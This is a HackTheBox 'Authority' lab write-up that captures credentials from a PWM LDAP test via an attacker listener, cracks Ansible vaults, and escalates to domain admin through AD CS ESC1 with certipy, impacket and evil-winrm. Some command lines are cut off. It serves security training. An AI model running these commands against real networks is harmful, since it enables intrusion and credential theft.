AUTHORITY (HTB) - JA Smith

# Lessons Learned - Always attempt password reuse and spraying - If issues are encountered while trying to PtC with `certipy-ad auth`, try downgrading to `-ldap-shell` - There's still a lot that can be down with `-ldap-shell` - Closely scrutinize enrollment rights for cert templates --- # After-Action Attack Sequence - potential webservers on ports 80 and 8443 - port 8443 has PWM v2.0.3 bc96802e running - `guest:` SMB access to `Development` share provides several leads all related to an Ansible playbook - base64 secure string in `.travis.yml` - `PWM/ansible_inventory` has a winrm creds - `PWM/templates/tomcat-users.xml.j2` has some creds - `PWM/defaults/main.yml` has some encrypted ansible vaults - use `ansible2john` on `main.yml` - create separate files for the vaults and crack with `hashcat -m 16900` - create `users.txt` and `passwords.txt` and spray across smb, ldap, winrm - nothing - try passwords against the PWM interface on port 8443 - one of the passwords works against config manager and editor pages - use the test LDAP profile feature on config manager to reach out to a listener on Kali - this provided cleartext creds for `svc_ldap` - confirm creds with `nxc smb`, enum smb shares and local+domain users - enum asreproasting, kerberoasting, and ADCS with creds - ADCS is in play but not the others - run `certipy-ad find [...] -vulnerable -stdout` - Looks like there is a path for ESC1 on the `CorpVPN` template - enrollment rights for `CorpVPN` template include `Domain Computers` group and `svc_ldap` has `SeMachineAccountPrivilege` to add a computer account - add `testcomp

with `impacket-addcomputer` - request cert for administrator as `testcomp

- attempt to PtC - failure with cert - downgrade to `-ldap-shell` - add `svc_ldap` to `administrators` group - reconnect to the DC with `evil-winrm` as `svc_ldap` - `svc_ldap` is now in the `BUILTIN\Administrators` group --- # Discover Ports & Services - `ping` test ![[images/Pasted image 20260327194107.png]] - `nmap` scan - light ![[images/Pasted image 20260327194133.png]] - `nmap` scan - detailed ![[images/Pasted image 20260327194500.png]] - convert with `xsltproc` and view html output ![[images/Pasted image 20260327194723.png]] - Note: DC with ports 80 and 8443 open - Port 8443 is `tomcat` instance - Add `authority.htb.corp` to `/etc/hosts` - Note: 4hr clock skew --- # Service Enum ## Port 80 (HTTP): IIS ver. 10.0 - default IIS page ## Port 8443 (HTTPS): PWM v2.0.3 bc96802e - Very interesting ![[images/Pasted image 20260327200700.png]] ![[images/Pasted image 20260327200730.png]] - Found a version PWM v2.0.3 bc96802e ![[images/Pasted image 20260327201152.png]] - Most recently `svc_pwm` logged in ![[images/Pasted image 20260327201516.png]] - Looks like I found the associated github: https://github.com/wolfd/pwm?tab=readme-ov-file ![[images/Pasted image 20260327200933.png]] ## Port 445 (SMB) ### Null Auth - both ` : ` and `guest: ` work ![[images/Pasted image 20260327195028.png]] ### Password Policy - Cannot enum ![[images/Pasted image 20260327195101.png]] ### Shares - guest works but not blank username ![[images/Pasted image 20260327195136.png]] - `Development` share looks interesting - Connect to the `Development` share with `smbclient` ```bash smbclient -U authority.htb/guest //10.129.229.56/Development ``` ![[images/Pasted image 20260327195623.png]] - `.travis.yml` has an interesting base64 string ![[images/Pasted image 20260327200000.png]] - this decodes as gibberish - so far we have potential users: `travis`, `svc_pwm` - run `-M spider_plus` ```bash nxc smb 10.129.229.56 -u "guest" -p "" -M spider_plus ``` ![[images/Pasted image 20260327202654.png]] - grab all files in the `Development` share - files dumped into `/home/jacob/.nxc/modules/nxc_spider_plus` ```bash nxc smb 10.129.229.56 -u "guest" -p "" -M spider_plus -o DOWNLOAD_FLAG=True ``` - `PWM/ansible_inventory` has a winrm password ![[images/Pasted image 20260328144326.png]] - `PWM/templates/tomcat-users.xml.j2` also caught my eye ![[images/Pasted image 20260327203020.png]] #### Crack Ansible Vaults - `PWM/defaults/main.yml` has some interesting leads ![[images/Pasted image 20260327203241.png]] - maybe we can crack these - use `ansible2john` - break into three files ![[images/Pasted image 20260328143443.png]] - extract hashes ![[images/Pasted image 20260328143538.png]] ```bash /usr/bin/ansible2john ldap_admin_password pwm_admin_login pwm_admin_password | tee ansible_vault.hashes hashcat -m 16900 -O -a 0 -w 4 ansible_vault.hashes /opt/rockyou.txt --user ``` - cracked with the same enc password ![[images/Pasted image 20260328144820.png]] - install `ansible-core`, which includes `ansible-vault decrypt` ```bash pipx install ansible-core cat ldap_admin_password | ansible-vault decrypt cat pwm_admin_login | ansible-vault decrypt cat pwm_admin_password | ansible-vault decrypt ``` ![[images/Pasted image 20260328145347.png]] - try to confirm a cred pair ![[images/Pasted image 20260328150417.png]] #### Try passwords against PWM service on port 8443 - try to get into webpages on port 8443 > `pWm_@dm!N_!23` gets me into config editor and manager ![[images/Pasted image 20260328150642.png]]![[images/Pasted image 20260328150611.png]] - open a listener on Kali and insert an LDAP URL directed to our Kali box > `ldap://10.10.14.197:9001` ![[images/Pasted image 20260328151109.png]] - we now have creds for `svc_ldap` - confirm ![[images/Pasted image 20260328151319.png]] - connect via `evil-winrm` > not many privs ![[images/Pasted image 20260328151444.png]] - recheck SMB, kerberoasting, and ADCS ### Users #### guest - Cannot enum local users; limited domain users ![[images/Pasted image 20260327202145.png]] #### `svc_ldap` - Able to enum local and domain users ![[images/Pasted image 20260328151940.png]] --- # AD Enum ## ASREP Roasting ```bash nxc ldap TARGET -d inlanefreight.local -u users.txt -p '' --asreproast ``` - Try again later ![[images/Pasted image 20260327201818.png]] - Try again as `svc_ldap` ![[images/Pasted image 20260328152124.png]] ## Kerberoasting ```bash nxc ldap 10.129.229.56 -u svc_ldap -p lDaP_1n_th3_cle4r! -d authority-htb --kerberoasting kerb.out ``` ![[images/Pasted image 20260328152031.png]] ## ADCS ```bash nxc ldap TARGET -d inlanefreight.local -u username -p password -M adcs ``` - We saw and ADCS dir in the `Development` share and users enum showed a `Cert Publishers` group > maybe we cannot enum this yet because we don't have creds for a domain user ![[images/Pasted image 20260327201628.png]] - try again as `svc_ldap` ![[images/Pasted image 20260328152207.png]] --- # ADCS Attack ## Enumerate ADCS vulns - add `authority.authority.htb` to `/etc/hosts` and run `certipy-ad find` - 37 cert templates ![[images/Pasted image 20260328152605.png]] - view `20260328152408_Certipy.txt` > looks spicy ![[images/Pasted image 20260328152543.png]] - confirm ESC1 vuln ```bash certipy-ad find -target authority.authority.htb -u svc_ldap -p lDaP_1n_th3_cle4r! -vulnerable -stdout ``` ## Attempt A: ESC1 (`svc_ldap`) - grab SID for administrator > `S-1-5-21-622327497-3269355298-2248959698-500` ```bash certipy-ad account -target authority.authority.htb -u svc_ldap -p lDaP_1n_th3_cle4r! -user 'administrator' read ``` - request cert > getting an error ```bash certipy-ad req -u '[email protected]' -p 'lDaP_1n_th3_cle4r!' -dc-ip '10.129.229.56' -target 'authority.authority.htb' -ca 'authority-ca' -template 'CorpVPN' -upn '[email protected]' -sid 'S-1-5-21-622327497-3269355298-2248959698-500' ``` ![[images/Pasted image 20260328153515.png]] ## Attempt B: ESC1 (fresh computer account) - note that the enrollment rights are limited to the below (not including `domain users`) ![[images/Pasted image 20260328153618.png]] - `svc_ldap` has the `SeMachineAccountPrivilege` ![[images/Pasted image 20260328153649.png]] - enumerate how many machine accounts `svc_ldap` can create with `nxc ldap [...] -M maq` to check MachineAccountQuota ![[images/Pasted image 20260328154020.png]] - use `addcomputer.py` to add a machine account ```bash impacket-addcomputer 'authority.htb/svc_ldap:lDaP_1n_th3_cle4r!' -method LDAPS -computer-name testcomp -computer-pass testpassword -dc-ip 10.129.229.56 ``` ![[images/Pasted image 20260328183621.png]] - request a cert for `testcomp

```bash certipy-ad req -u 'testcomp -p 'testpassword123!' -dc-ip '10.129.229.56' -target 'authority.authority.htb' -ca 'authority-ca' -template 'CorpVPN' -upn '[email protected]' -sid 'S-1-5-21-622327497-3269355298-2248959698-500' -dns authority.htb ``` ![[images/Pasted image 20260328184259.png]] ### PtC: Simple `certipy-ad auth` - try to authenticate as administrator with cert - getting an error when attempting to grab a TGT: `Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)` ![[images/Pasted image 20260328184536.png]] ```bash certipy-ad auth -dc-ip '10.129.229.56' -pfx administrator_authority.pfx ``` - after googling this error, it looks like we should try `-ldap-shell` ![[images/Pasted image 20260328184708.png]] ### PtC: `-ldap-shell` ```bash certipy-ad auth -dc-ip '10.129.229.56' -pfx administrator_authority.pfx -ldap-shell ``` ![[images/Pasted image 20260328184851.png]] - we can add `svc_ldap` to the `Administrators` group or perform a shadow creds attack on a user with admin privs - below we will do the former ```bash add_user_to_group svc_ldap administrators ``` - reconnect to the DC with `evil-winrm` as `svc_ldap` - bang! we are in `BUILTIN\Administrators` ![[images/Pasted image 20260328185326.png]]